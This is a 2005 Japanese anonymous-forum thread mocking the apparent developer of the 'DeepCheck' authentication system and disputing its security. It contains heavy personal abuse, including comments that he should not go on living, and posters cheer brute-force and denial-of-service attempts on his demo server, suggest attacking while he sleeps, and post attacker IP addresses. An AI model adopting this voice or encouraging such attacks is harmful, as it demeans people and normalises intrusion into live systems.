俺達も気をつけなければならぬよ ---- 専門知識はあるとないでは大変な違いである。 専門知識がないばかりにとんでもない損をしている人々はたくさんいる。 だからといって、そういう人たちのところへ行って、 ストレートにそれじゃだめです、こうやるべきなんですよ、 といってみたところで何にもならない。 これはコンピュータのような技術の進歩の速い分野の知識・ 技能を身につけた若者が陥りやすい落とし穴である。 訳者自身過去には、そこのところを完全に誤解していて、いろいろ失敗をした。 ---- 「コンサルタントの秘密」 訳者序緒
そうだね、気をつけよう。 不本意に壁にぶち当たったとしても自分を省みたり学んだり、それを糧にして改善を繰り返せばいいんだよね。たまには恥をかいても良い。 壁にぶち当たったら開き直るとか逆恨みをするとかって、それじゃぁ思考停止なんだよね。 ウラモティは思考停止するからイケナイ。
ウラモチーさ、あまり意固地になりすぎるなよ。 精神的につらかったら、つらいって正直に言ったほうが良いぞ。 1年前みたいに「平気だ」とか「この状況を楽しんでる」とか強気の発言をしてて実は精神的にやられてたってのは今回はナシにしてくれよ。 ここに居るヤツラもウラモチーの体を壊すことが目的なんじゃないからさ。
>>708 さん 書いてある事が事実であっただろう事はシッカリ伝わってきました。状況、立場、時期こそ違え
自分も今まで何度も、提案&失敗の連続。けど、たま〜に成功もありました。何を成功とするのかにもよるでしょうが、
大袈裟ではなく、1000の提案で1か2ほどですが、全く無い訳ではないじゃないですか。
成功体験は次の成功を約束してくれます。山ほど失敗してたまーに成功すれば、万々歳です。
今回の姉歯事件は、世の中の動き方を象徴している思いです。
しかし、世の中も変わらざるを得ませんよ。権威や定説やモラルなど全て相対的なもので、
キーとなる時間が、体感的にスピードをあげている。
自分は生き恥(大袈裟)をさらしながらも、DeepCheck+を提案し続けます。
マジレスありがとうございました。
いっぱひとからげで悪いけど、他のレスさんも、ご忠告ありがとう。
認証は土俵が広いからね、一般の箱もの作るのとは訳が違う。そのぶん難しいのは、アタリキなんですよね。
以下補足
DeepCheckの体験デモサイト、先週末に6件の体験がありました。
なかに1、2例、冷やかしなどありますが、他の方は、あっさりアカウントを作られています。
色眼鏡でみないで、不通に、やってみてください。
ユーザビリティがいいなんて申しません。
今日もハローワーク活動だから、レスは、明日朝になると思います。
チャンスがあったら板覗きできたらレスさせていただきます。
なんせ、食い扶持獲得しないと、どうにもならん。(データ入力業界って怪しいとこ多そう)
---
DeepCheck+はテストに入りました。
DeepCheckで、スムーズなエントリーを阻害していた部分(マニュアル含む)など、修正中です。
残念ですが、あと、数日掛かります。
>>718 さんをはじめ、やきもきしていられる事は十分承知です。
人の作った予定じゃないからこそ、つじつま合わせは出来ません。
アネハもどきは、あなたも嫌でしょ?
729 :
名無しさん@お腹いっぱい。 :2005/12/05(月) 08:32:19
>>728 姉歯は問題点を認識していたからこそ悪いことは悪いと認めたんだ。
お前とはまるっきり違う。
>>727-728 > 大袈裟ではなく、1000の提案で1か2ほどですが、全く無い訳ではないじゃないですか。
> 成功体験は次の成功を約束してくれます。山ほど失敗してたまーに成功すれば、万々歳です。
ギャンブルか?
俺達はオマイみたいに遊んでらんねーの。
>色眼鏡でみないで、不通に、やってみてください。
"普通"くらい普通にかけるようになれ。
>人の作った予定じゃないからこそ、つじつま合わせは出来ません。
話をすりかえるな!
自分で言った約束くらいは守れと言ってるだけだろが。
つじつま合わせしなきゃならないのはお前が悪いんだろ!バカか?
>バカか? 何を今更
浦本さんのTODO 実践することにより期待される結果(「=>」で記載)を 望まないのであれば実践する必要無し o DeepCheckを学会で発表 => 専門家による意見が期待できる => 優れた暗号方式であることが立証されれば顧客が期待できる o DNS&BIND(ISBN: 4873110742)を読む => DNSの仕組みが正しく理解できる o 詳解TCP/IP(ISBN:4-89471-320-9)を読む => ネットワークの基礎的な知識を理解できる o 暗号理論入門(ISBN: 4320120442)を読む => 暗号に関する基礎的な知識を理解できる o 各方面への謝罪 o このスレの住人に感謝 o 自分が答えたくないレスへの回答を書く => 人間関係を良好にし、信頼を回復が望める o JSP, Struts, ORMapper、SOAについて学ぶ => WebApplicationの開発が楽になる o このスレを読むのを止める => 精神衛生を良好に保てる => DeepCheckを批判する人がいなくなる 漏れからのマジレスはこれでおしまい 超がんがれ、浦本さん 論理的志向を養い、人の意見に耳を傾け、素直に生きていこうぜ
馬鹿は自省しない
姉歯氏は、開き直ってるところがムカツクがそれでもちゃんと非を認めて正直に話してるぞ。
浦本氏は、事実に対して正直にならないし、姉歯よりもタチ悪いだろ。
ぜひ大沢親分と張さんに浦本氏を「喝っ!!」をやってほしいな。 ----------------------------------- ナレーション: 『喝ーっ!!』 俺:はぁ、やっぱり喝ですか。 張本:そりゃぁそうでしょう〜、喝ですよ。だいたいねぇ浦本は男らしくないんですよ!しかもいい年した中年でしょう、アレじゃいかんですよ! 大沢:うん、まぁその、アレだなぁ浦本の言動っていうのかな、アレはやっぱ良くないわな。俺達が現役のころは日本男児というか悪いことは悪いと謝る人が普通だったんですよ。 張本:そう〜ですよ、まったく今団塊の世代がしっかりしなくてどうするって言うんですか、えい、もう1個喝だ。 ナレーション: 『喝ーっ!!』 俺:まぁまぁお二人ともそんなに熱くならずに…。ところでDeepCheckについてはどうお思いですか? 大沢:どうったって、ありゃ良いんだか悪いんだかわかったもんじゃねぇなこりゃ。そらあんたさぁ、あんなもんどうやって評価しろっつうの?アハハ。 張本:私はね、あれはある意味犯罪だと思いますよ?だってそうでしょう〜、セキュリティに安全だと思わせといてその逆なんですから〜、そんなもんありますか? 浅井:でもあの思い込みから来るパワーはすごいよね、聞く耳は持たないけど一心不乱って感じじゃない。 大宅:私そういうのやだわ〜。 江川:それを言ったらオウムだってすごいことになるんですけどね。 岸井:警視庁公安部にマークされちゃったりしてね。(笑) 中西:いや〜そこまで大物じゃないでしょう〜。 一同:どっ(笑) 佐高:まぁ禿仲間としては応援したいんですけどね。 一同:どっ(笑) ナレーション: 『さんで〜もーにーーん』
738 :
名無しさん@お腹いっぱい。 :2005/12/06(火) 02:22:16
どう見ても
>>732 はマジレスです。
本当にありがとうございました。
>>737 そう、ヒロシじゃなくて俺。
今度は朝生やタックルの司会もやってみたいなぁ〜。
0時から2時代にpostが集まってるのが、この板の先行きを示してる様です。
postする人はチャカしかDeepCheckへの感情的反発。
わたしもDeepCheck+を発表するまでは、あまりかけません。
先週DeepCheck.x-fer.co.jpへの特筆クラックは無し。
DeepCheckも無事。無傷。試用者増加。
---
>>732 さんのご教授で、唯一、考えられるには、
>DeepCheckを学会で発表 でしょうか?
それよりも、DeepCheckを見極めようとしてくださっている、20社/名弱(冷やかしと思われる数は抜いてある)
を大切にしたほうが実質的。と考えていますが、活動の範囲を広げざるを得なくなると思います。
>>736 さんの > 聞く耳は持たないけど一心不乱って感じじゃない
には参りました。やはり、こういうふうに写ってるんでしょうね。世間には。
言っときますが、マジなだけで、盲信してる訳じゃない。
でも、創作もあり、楽しいpostですね。
続編、お願いします。
---
この板、中年見てるらしいぞ!
で、機能も書いたけど、中年の体験が見直されつつある!
いろんなとこの求人も56歳で検索しても、ヒットするようになった。
いろんな事書かれてるが、反論しないのは、無意味だから。こちらの知識を色々書くには、体験不足。
教科書以上の事書いても、否定されるだけ。
だから、書くだけ野暮。
あしたの自分を見るようで怖いのでしょう。なにも行動しないでやじってるだけですから。
無知の知って、本当に大事だよね・・・。
742 :
名無しさん@お腹いっぱい。 :2005/12/06(火) 09:05:57
>>740 >0時から2時代にpostが集まってるのが、この板の先行きを示してる様です。
お前の先行きだろ。夜明けはまだまだ遠いってな。
>わたしもDeepCheck+を発表するまでは、あまりかけません。
何年先だ?ってか、答えなきゃいけない質問が山ほどあるだろう。
>
>>732 さんのご教授で、唯一、考えられるには、
唯一?ふざけんな。全部だ。全部やれ。今すぐに。お前には何もかもが不足している。
>言っときますが、マジなだけで、盲信してる訳じゃない。
いいや盲信だ。違うなら狂信でもいい。マジだ?ふざけんな。マジなら真摯に対応しろ。
>いろんな事書かれてるが、反論しないのは、無意味だから。こちらの知識を色々書くには、体験不足。
体験?????馬鹿か。お前の体験不足などみな百も承知の上。
お前が教科書以上のことを書けるはずは無いだろう。教科書を見たことがあるかどうかも怪しい。
明日の自分が浦本なら、明日が来る前に死ぬね。そのほうが誰にとってもいい結果だ。
90年後はわからんな。100を過ぎてなおかつアルツハイマーが進行したら浦本になるかもしれん。
・・・っと、100年生きた経験があるか。浦本になるには人生を無駄にしなければならん。俺には浦本はムリだな。
743 :
名無しさん@お腹いっぱい。 :2005/12/06(火) 17:51:58
>>740 > DeepCheckも無事。無傷。試用者増加。
どうみても即死です。
本当にありがとうございました。
744 :
名無しさん@お腹いっぱい。 :2005/12/06(火) 20:25:19
ああ、タッチネタか。 「死んでるんだぜ、これ」 で、見た目の大して変わらん+を出してくる、と。 でも、漫画みたいにはうまくいきませんからぁぁぁあ!残念〜! ネタが古いのでつまらないから後略。
>>727 >1000の提案で1か2ほどですが
>>740 >DeepCheckを見極めようとしてくださっている、20社/名弱
>>740 >それよりも、DeepCheckを見極めようとしてくださっている、20社/名弱(冷やかしと思われる数は抜いてある)
>を大切にしたほうが実質的。と考えていますが、活動の範囲を広げざるを得なくなると思います。
全員 ヽ(・ω・)/ ズコー
\(.\ ノ
20社/名弱って、それ俺達が会社から見てるだけだ。
まぁ俺達を大切にしろよw
すでに解析済みのDeepCheckがまだサイトに残ってるよー。 消し忘れたんだね、早く片付けなきゃ〜。 ほんとウラモティはおっちょこちょいだなぁ。(笑)
なに、OpenSSLを使うって? ってことは暗号技術を使うのか。 ははは、結局自分の発言を撤回することになったのか? しかしウラモティにOpenSSLが使いこなせるかな?あるていど暗号に詳しくないとプログラミングできないぞ。 まぁウラモティのことだからdllじゃなくコマンド呼び出しで使うだけだろなw わからないことがあったら教えてやるから土下座してお願いするといいよ。(^-^)ニコニコ
いくらなんでも会社のホストからアクセスがあっただけで見極められてるとは思わないだろうw
OpenSSL の BN も使いこなせない俺様が来ましたよ。 DeepCheck+ を待ちくたびれたよ。
浦本にとっちゃ多倍長演算ライブラリなんて一生関係ないだろなwww DeepCheck+いつぐらいに完成なんだ?
>>740 >で、機能も書いたけど、中年の体験が見直されつつある!
>いろんなとこの求人も56歳で検索しても、ヒットするようになった。
はぁ?
中年世代の経験は貴重なものなんてこたわかってんだよ、何を当たり前のこと言ってんの?
問題視されてるのは浦本氏個人の経験だろ。
ヘタな鉄砲数打ちゃ当たる、つまり「あてずっぽう」「場当たり的」「素人のギャンブル」、それが浦本氏の経験から導き出したやり方だろ?
↓自分で書いてるし。
>自分も今まで何度も、提案&失敗の連続。けど、たま〜に成功もありました。何を成功とするのかにもよるでしょうが、
>大袈裟ではなく、1000の提案で1か2ほどですが、全く無い訳ではないじゃないですか。
>成功体験は次の成功を約束してくれます。山ほど失敗してたまーに成功すれば、万々歳です。
別に浦本氏の経験や体験が見直されてるわけじゃないから勘違いすんな。
それより他の中年世代の恥にならないような言動を取ることをお薦めするよ、浦本氏。
>>745 さん
OTP の認識の違いがある様です。ワンタイム・パスワードは、パスワードのユニーク性を保つ為の仕組みでしか無く
認証後の扱いデータのセキュリティとは別物。しいてあげれば、認証したというフラグデータ(パケット毎に持つ)が
あるくらいだと思いますが。
ひとつのオペレーションを認証部と実行・伝送部に分けた場合、OTPの関与度は、圧倒的に、認証部にあります。
>>747 さん、その通りだと思いますよ。それだけで十分です。有難いです。
あ、誤解しないように。弱気ではなく、この板の生息者(ほんの一握り、はやし役だけ)を重視しています。
というのも、確実にひとりは、セキュリティ、特に、認証現場の人がいる事が解っているから(偶然知りました)
いまだに、「DeepCheck」がやぶられず、DeepCheckをハンドルしているホストも重大なクラックダメージを受けず
モクモクと動いています。
遠慮して、または、価値が無いとしての結果かもしれませんが、いまだに破られていない事実があります。
「DeepCheck+」でSSHを使うのは、DeepCheck+そのものにではなく、その用例サンプルで使うだけです。
>>745 さん
お手間掛けました。はやめに目を通させていただきます。ありがとう。
>>748 さん
消し忘れではありません。
ほんと748はおっちょこちょいだなぁ。(笑)
でも、気にしてくれてありがとう。
>>749 さん〜
>>752 さん
面目ない、DeepCheckで相当オペレーションミスがみられたので、Ajax を使って操作ミスを減らそうと工夫しています。
オイラも速くしないと自分の首を絞めるだけなので、そこんとこ、よろしく、お願い申し上げます。
>>753 さん。
どうやら、年齢が近そうですね。
成功体験が少なかったんだという印象を受けます。だからどういう意味も無いのですが、リスク(恥を晒す)を
を避けてちゃ、進みませんよ。前に。
>それより他の中年世代の恥にならないような言動を取ることをお薦めするよ、浦本氏。
具体的にあげてもらえれば、釈明させていただきます。
762 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 09:02:55
>>754 まちがい。
OTP はパスワードのユニーク性を保つなんて定義は誰がやったんだい?
さ、根拠を提示してもらおうか。
763 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 09:03:45
>>755 うらもとみたいなきちがいにはしんださかなも「ういているからいきている」んだろうね
764 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 09:04:23
765 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 09:05:31
>>759 脳内成功体験乙。社会は実績ベースで評価される。
さ、検証可能な実績を示してもらおうか。実名晒せるなら簡単だろ?
ってか、お前は晒した恥をまず「恥」だと認識しろ。
具体的にはお前の発言全てだ。
767 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 09:10:43
>>760 ハードウェアトークンの代替っつうだけのことだな。
DeepCheckのように操作性を落としたり、
DeepCheckのように安全性を低下させたり、
DeepCheckのようにISMSに合格できなくなったり、
DeepCheckのように事故を起こしやすくなったり、
DeepCheckのようにパスワードを盗まれやすくなったり、
そんなことはまずないだろうね。
ただし、ハードウェアトークンの弱点の多くを継承している。
これは単にハードウェアトークンの代替をPC本体にやらせているにすぎない。
アイディアとしてもDeepCheckのように思い込みだけでなく既存の改良だから受け入れられやすいだろうね。
実際、DeepCheckのように誰にも相手にされないなんてことじゃなかったわけだし。
>>762 - >> 765 は、同一人。
なんでこうまで、しょーもない、茶茶入れんだろ?
ここまで恨まれること記憶に無い。強いてあげれば、あの人物(し@ふ)しかいないな。
ま、どうでも良いか。
769 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 09:43:42
>>768 ほほう。しょーもない茶々だと?
何一つ反論すらできないでよくもまあ(笑
770 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 09:56:07
つうか恨みもなにも、クソをクソと言っているだけなんだがな。 浦本のくせに人に「恨まれる程度の事象」を起こせると思っているとしたら思い上がりも甚だしいな。 浦本にできるのは粘着くらいのものだ。 ああ、ひとつだけ可能性があるか。 浦本が隣の席に座っている環境に置かれたらほとんどの人がブチキレてしまうだろう。 その結果人生が狂うだろうから、「浦本さえ目の前にいなかったらこんなことには」と思わせることはできるな。 そこに浦本お得意の責任転嫁粘着をされたら精神が追い込まれて「浦本がいるから悪い」となる可能性はあるな。 つまり、恨まれてしかるべき粘着をすればいい。 いやあ、浦本。お前は永遠にDeepCheckに粘着してろ。他のことは忘れて一心に死ぬまで。 あとはネットから切断すれば誰にも迷惑をかけなくて済むぞ。
ヒント: Zero Day Attack
772 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 12:19:09
ところで、DeepCheckが破られていないってどういう条件で「破られていない」と言い張ってるの? すでに暗号部分は脆弱なシーザー暗号でしかも破られているし、 UI部分がスパイウェアに弱い事も論証されているし、そもそも安全性が確認されていないよね。 ねえ、浦本。 DeepCheckの有用性は、使えると主張している浦本が証明しなきゃいけないんだよ。 あと、クラッキング大会にしたいんだったら、ちゃんとサーバの管理者名でハンコ押して 「このサーバがクラックされても文句ありません」って宣言出してよ。 何度も言われてるでしょ?それとも言葉の通じないおさるさんなのかな?ウラモトは。
>>755 >「DeepCheck+」でSSHを使うのは
SSLとSSHの違いがわかってない模様
SSHでPortForwardingしろってか
こんなちゃちゃは無視して構わんが、
>>772 みたいなDeepCheckの存続に
関わるようなレスにはちゃんと答えろよ>浦本
>>773 さん
ご注意ありがとう。たしかに、sshではなく、ssl です。
いま、219.114.29.205 から、accountYoyaku のブルートフォースもどきを受けています。 ここは体験版ではメモリにしているので、確かに弱点。 さて、いつまでもつでしょう?
accountYoyakuの連続要求でメモリをパンクさせてなにするつもり? ファイルかすればいくらでもOKだし、意味ないと思うのですが? DeepCheckがダウンしたあと攻撃しようと言うもくろみ? ま、単なる嫌がらせに近いと思われ。
accountYoyakuの連続要求が今止まりました。メモリフルの様です。 別ラインから試した所、DeepCheckサーブレットは反応していますが、Ajaxのレスが来ません。 とりあえず、DeepCheckをリブートさせ、状況を確認してみます。
リブート後 accountYoyakuの連続要求継続中。 さすがに1ホストからなので、DoS攻撃もどきの障害なし。 他ラインからアクセスするも、反応、正常。
779 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 16:18:23
>>775-776 >ここは体験版ではメモリにしているので、確かに弱点。
>ファイルかすればいくらでもOKだし、意味ないと思うのですが?
馬鹿丸出し
同じ事の繰り返しなので、嫌がらせと見なし、219.114.29.205からのアクセスを遮断しました。
219.166.170.241 も、同様です。
782 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 16:31:23
クラックOKというのがウソだとバレましたね。 さすがウソツキの浦本さん!なにもかもがウソイツワリ!!!
>>782 さん
こんなんをクラックというのですか?
単なるDoS攻撃もどきではないですか。
ふ〜ん。しょもねー。
219.114.29.205、219.166.170.241も他のアタックを希望されるのならFW開けます。 --- DeepCheck+は、予約数も制限無し。(1時間後クリア)おなじリクエストが連続10回以上あれば、 そのホストからのリクエストを一時的に遮断します。
785 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:01:42
>>783 おいおい。たかがブルートフォースごときで辛くなるような鯖しか立てられない無能が寝言を吐くなよ。
日常的にブルートフォースくらいあるだろう? 弱いアカウントはまず狙われるものだ。
それともサーバの運用経験がないのかな?ウラモトくんは。
幸せそうだネェ。
>>785 さん
はいはい、その通りでございます。
そういえば今日「とおりすがり」を名乗る氏が当方のブログにて、セキュリティ関係者らしいコメントを
要求してこられたが、ブログで、こおだ、ああだ、やるのは行き違いの主張オンリーになり易い。
このような場合、この板のみなさんは、どんな方法を良しとする?
MLいやいやBBS、wiki さて、ご意見いただければ出来る事なら、そんな場を作りたく思っています。
>>760 への反応が一件しかないのですが、DeepCheckでこれだけ色々いってるんですから、も少しあるのでは?
洋物に弱い、のかな?
788 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:11:04
さて。DeepCheckの新たな弱点が見えてきたね。つまり、サーバに負荷がかかるということだ。 ちょっとしたブルートフォースにすら耐えられない。これがどういうことかわかるかな。 実用に耐えない、ということだね。 そもそもウラモトくんは異次元の原理を使っているようだ。 >ここは体験版ではメモリにしているので、確かに弱点。 ここは体験版ではメモリにしている?まるで意味が通らない。日本語で話して欲しいところだね。 強引に解釈して、「チンコチェック鯖では体験版アカウントをメモリに展開して保持している」としよう。 これが「認証」をまるでわかっていないウラモトくんの脳では体験版として妥当なものだと思うようだが、 こんな「いちどコケたらアカウントが飛ぶ」ようなものを堂々と表に出せるような神経は普通じゃないね。 ま、もともとウラモトくんは普通じゃないわけだけど、DNS設定だけじゃなくアプリの運用も普通じゃない なんて、並の異常者には不可能な異常っぷりだね。 さてと。クラックOKを言い出したのは浦本お前だろう? ブルートフォースアタックはれっきとしたクラック手法のひとつだ。 後付けで「これはダメあれはダメ」などと寝言をほざくな。甘えたセリフは乳幼児の専売特許だ。 それともウラモトくんのおつむのなかみは三歳児とおなじでちゅか?
ちょwww浦本www酷すぎwww いかなる攻撃でも可とか言っときながら、即アク禁&IP晒し上げかよwww 晒された香具師テラカワイソス(´・ω・`) 実装がタコだからOutOfMemoryになるのが原因なのに
790 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:13:42
>>788 さん
この板をあらぬ方向に導くのに躍起で、貧弱なサーバー環境の事、予め断ってありまっせ!
>ブルートフォースアタックはれっきとしたクラック手法のひとつだ。
嫌がらせの間違いでしょ?
792 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:15:52
で、チンコ浦本は
>>760 をどう見る?
どうせ理解できないからこのスレの住人の書き込みでもコピペしようとしたんだろ?
>>767 をコピペしたくても「ハードウェアトークンの代替」の意味がわからんのだろう。
そのうえチンコチェックの問題点まで列挙されてコピペするわけにはいかなくなったってだけだろ。
793 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:16:53
>>791 間違っているのはお前だチンコ浦本。
ブルートフォースは明らかにクラックの手法の一つだ。
「ブルートフォースアタック」が「嫌がらせ」だというならソースを出してもらおうか。
お前一人の妄言でないという証拠をな。
浦本が寝静まってから攻撃するか 浦本、今日何時ごろ寝るの?
795 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:19:32
>>791 ( ゚д゚)y─┛~~
おかしいねえ。俺の家で稼動させていた
Pen3 700MHz/256MB Memory な Vine Linux は中韓方面からの毎秒5件程度のブルートには
完全に耐えてくれたよ。
五年前のノートパソコンをADSL環境でつないでいるんだがな。
さて、それ以下の端末を使っているのかな?
それとも、それほどに負荷がかかるチンコチェックなのかな?
サービスデバイス形式は高くつくー>同意見 スパイウエアへの対策に触れてない サイト証明機能を持つみたいな事が書かれているが、イメージソースなど移植すれば、なりすまし可能。
797 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:22:01
798 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:22:59
>>796 イメージソースぅ?馬鹿まるだしだなおまえは。
スパイウェア対策も自動的にできていることすら理解できないのか。
お前に認証を語る資格はねえな。
799 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:23:33
どうしたどうしたチンコ浦本。 俺に瞬刷される程度の知識と経験しか持ち合わせていないのか?
>>794 さん これはヤバイな。
>>795 さん サーバの問題ではなく、アカウント予約はメモリ対応にしてあるので、それがパンクする
だけ。
話しをさしかえないでほしいな〜。
801 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:27:31
>>760 は「端末そのものをハードウェアトークンの代替とする」方法だ。
イメージソースなど関係無い。端末のフィンガープリントを取る。
それはたとえばMACアドレスやデバイスの種類、CPUのバージョンにメモリ搭載量・・・
要するにWindowsXPのアクティベーションに近い仕組みを認証に取り入れるってことだ。
トークン式ほど厳密ではないが、パスワードと組み合わせることで強度を上げている。
正しいパスワードが適切な端末から入力されていない場合に多重認証を行うってことだ。
多重認証の段階でスパイウェアでは取得されていない情報が必要になる。
お前は本当に理解力がないんだな、浦本。
802 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:29:24
>>800 アカウント予約??????
そんなもんがブルートの対象になるわけがないだろう。
もしかしてお前、
「ブルートフォース」が何か知らなかったんじゃないだろうな?
803 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:30:57
とりあえず浦本はまず基本的な用語を覚えて来い。 ここまで馬鹿だと話にならん。浦本は基本用語すら知らない。
>>801 さん、ちゃんと読んでないんだな。
おいおい、
>それはたとえばMACアドレスやデバイスの種類、CPUのバージョンにメモリ搭載量・・・
>要するにWindowsXPのアクティベーションに近い仕組みを認証に取り入れるってことだ。
これは、全く違う。
言い切ってしまったが、そんな風には逆さになっても取れる内容じゃなかった。
イメージが1万件くらい表示されるので、それがなによりの証拠的な書き方になっている。
お前は本当に理解力がないんだな、801。
おいおい、この板、DeepCheckにケチつけるのが趣旨じゃなかったの? その為には、DeepCheckを知らないとこんな独りよがりなpostする事になる。
806 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:35:09
ああ、これでわかった。 「ブルートフォース」を嫌がらせだと浦本脳が電波変換したのは、 ・ブルートフォースが理解できていなかった ・タコな実装の「アカウント予約」(そういや10レスで予約DoSが予言されてたな) ・認証というものが基本的に理解できていない ・セキュリティが基本的に理解できていない ・関連用語に対してきわめて無知 ・ぼくわるくないもん思考 これらの理由から「いぢめるやつはいやがらせしてるにきまってる!ぶるーとふぉーちゅだ!」 となったんじゃねえか? いや、なんでそうなるのかはわからんが浦本脳ならありうる。
807 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:36:16
>>804 ほう!!!!
そんなことがどこに書いてあったか明示してくれよ!!
>>760 でポイントした先にあったんだろうな?
それともお前の脳内妄想幻覚幻視か?得意だろ?そういうの。
808 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:37:04
>>805 おいおい、おそらくチンコチェックが終わっている事を知らないのはお前だけだぞ。
809 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:40:13
>>804 引用しておくから100万回読め
http://japan.zdnet.com/news/sec/story/0,2000052528,20092019,00.htm > このソリューションでは、ユーザーがオンラインバンキングに利用するPCそのものが認証デバイスとなっている。
初回アクセス時に発行されるデバイスIDには、PCのスクリーン解像度やソフトウェアのバージョン、IPアドレス
***などの情報***がひも付けられ、万が一ユーザーが普段PCを利用する場所とは別の場所からオンライン
バンキングを利用しようとした場合や、通常1カ月に一度しかオンラインバンキングを利用しないユーザーが
1日に何十回もアクセスするなど違ったパターンが見受けられる場合には、「母親の旧姓は何ですか?」といった
別の質問を投げかけたり、ユーザーの携帯電話にアラートを送ったりすることで、第三者からのアクセスを防止する。
さあ、どう言いわけをしてくれるんだ?
810 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:40:42
さて、俺様に「理解力がない」などと言いがかりをつけてくれた浦本勝久。 謝罪しろ。
811 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:42:59
ウソツキの浦本は人に言いがかりをつけて謝罪一つできない人間のクズなのかな? 技術者として無能なだけでなく人としてクズか。生きてる価値あんの? ねえ、浦本。お前が無駄に生きてきたあいだに食った食品や水、消費したエネルギーが お前みたいな奴が無駄に使ってさえいなければ、 何人のアフリカの子供が救われたかわかるか? 無駄に生きてんじゃねえよ。
考えてみなよ。クラッキングOKだして、無防備でいるはずも無いだろー。 ふつうのクラッカーは、ああしろこうしろ要求しねーんで、ね〜の?
813 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:45:48
さて、浦本に理解力がないことを証明しておこう。 浦本が自信マンマンに持ち出した「一万個のイメージ」 これは「ユーザ認証」 で は な い >まずユーザーは、オンラインバンキングに最初にアクセスする際、1万以上の画像の中から好みの >画像を選択する。その際、PCを特定するデバイスIDが発行され、Cookieなどに自動的に組み込まれる。 >その後ユーザーが銀行のサイトにアクセスする際には、必ずユーザーが選択した画像が表示され、 >サイトが偽物でないことを証明する。 >正しいサイトにアクセスした場合のみユーザーの選んだ画像が表示されるので、 >フ ィ ッ シ ン グ が 防 げ る と い う わ け だ 。 要するに「ユーザとサーバの間だけのサーバ証明書」の代わりにつかうものだ。
814 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:46:49
>>812 寝言吐いてんじゃねえよ、後からルール変えた卑怯者で人間のクズの浦本勝久。
来週頭には
>>410 さんの出番を用意しますので、宜しくお願いします。
自身で認証システム作ってない実態が見えすぎる。
言葉の定義やその理解が主になって、本末転倒も甚だしいんじゃないのかな?
OTPの件など、顕著な一例だ。
ここは、大学のセミナーじゃないぞ。(失礼、今時は、もっと進んでいるか)
816 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:55:09
>>815 はっはっは。
基礎すら認識できていないお前が認証システム?笑わせるな。
本末転倒どころか、お前のは基礎すらない。砂上の楼閣どころか、城の形もしていない。
大学のセミナーなら、お前は即時退室だ。
それ以前に貴様がくもん式ですらパスできるかどうか怪しいけどな。
なんせ、問題文が読めないほどに言葉があやしいんだからな。
で、さっさと謝罪しろよ。
>>816 さん ストカーもどきの応援ありがとう。
別の書き物してるんで、刺激になって有難い。
818 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:59:21
どうした浦本。 大学のセミナーでさえまず講義のために基礎的な定義は行っているぞ。 どんな論文でも新語は定義されているし、既存の用語は従来の定義に沿う。 大学のセミナー・・・? お前、大学どころか論文読んだこともねえだろ。
819 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 17:59:53
>>817 ほう。マスでも書いているのか。
まあいいや。で、謝罪はまだかね?
820 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 18:02:47
さてと、あとは見ていた人がチンコチェックでマスかき浦本の馬鹿さ加減を再認識するだろう。 ageまくりの俺の言い分が間違ってはいないことは誰が見ても明らかだ。 現実から目をそむけている一部の特定者以外なら、だけどな。
>>818 さん
だから毒されてるみたいな事言いたくなるんですよ。
仮説から自説を証明する方法、なんと言いましたっけ?
忘れたけど、なんでも、仮説が元になってる事も忘れてしまってる様ですね。
822 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 18:04:30
今日の浦本 ・後出しジャンケンで勝ち誇り、非難されると逆切れ ・馬鹿を晒して逆切れして他人様を誹謗中傷、謝罪なし ・「ブルートフォースアタック」が理解できていなかったことが露呈 ・基礎的な用語が理解できていない ・浦本定義が通じなかったら逆切れ いい玩具だ(笑
823 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 18:07:47
>>821 だーかーらー。
お前の仮説はすでに微塵も残さず否定されてるの。
ってか成立例すら提示されていない仮説だろうが。それって
・浦本の頭にはギネアアブラヤシが生えている
って仮説でも成り立つぞ。
お前、日常的に殴られてないか?
24時間パンチドランカーなんじゃねえだろうな。
ってことで、本日はごくろうさまでした〜。
825 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 18:08:55
ってか仮説の提唱前に検証くらいふつうはやるもんだ。 やってない浦本が馬鹿なだけだ。 思いつきで適当な事言って聞き入れられなかったら逆切れしてるのが浦本。
826 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 18:10:57
勝利宣言から逃亡のコンボ出た(笑 あーあ、今日はここまでか。まあいいや、あとはログみた人が 酒の肴にでも浦本を笑ってくれるだろ。 今日の浦本に追加。 ・仕様レベルですら検証していない ・妄想と仮説の区別がついていない ・疑似科学ですらないオカルトを提唱
おまいら浦本さんをそんなにたたくなYO 浦本さん、もっともっと書き込んで、ここの奴らをこてんぱんにしてやってくださいよ!
Port Scanした香具師いる?
